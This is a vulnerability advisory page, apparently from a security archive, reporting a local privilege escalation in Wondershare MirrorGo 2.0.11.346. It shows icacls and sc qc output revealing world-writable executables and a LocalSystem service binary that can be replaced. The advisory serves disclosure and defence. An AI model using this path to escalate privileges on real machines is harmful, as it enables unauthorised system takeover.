Wondershare MirrorGo 2.0.11.346 Insecure File Permissions

Wondershare MirrorGo 2.0.11.346 Insecure File Permissions: Posted Feb 24, 2022; Authored by Luis Martinez; Wondershare MirrorGo version 2.0.11.346 suffers from an insecure permissions vulnerability.; tags | exploit; SHA-256 | 7c357903c71131608d611e554bd946d3f3f155a0d469502402e051e43742df02; Download | Favorite | View

Wondershare MirrorGo 2.0.11.346 Insecure File Permissions

# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-23
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/mirror_go_full8050.exe
# Tested Version: 2.0.11.346
# Vulnerability Type: Local Privilege Escalation
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Privilege Escalation: 

# Insecure folders permissions issue:

C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe"


C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F)

# Service info:

C:\>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ElevationService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Driver Install Service help
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable
"ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it
with a malicious file that will be executed with "LocalSystem" privileges.

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Wondershare MirrorGo 2.0.11.346 Insecure File Permissions

Wondershare MirrorGo 2.0.11.346 Insecure File Permissions

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Wondershare MirrorGo 2.0.11.346 Insecure File Permissions

Share This

Wondershare MirrorGo 2.0.11.346 Insecure File Permissions

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems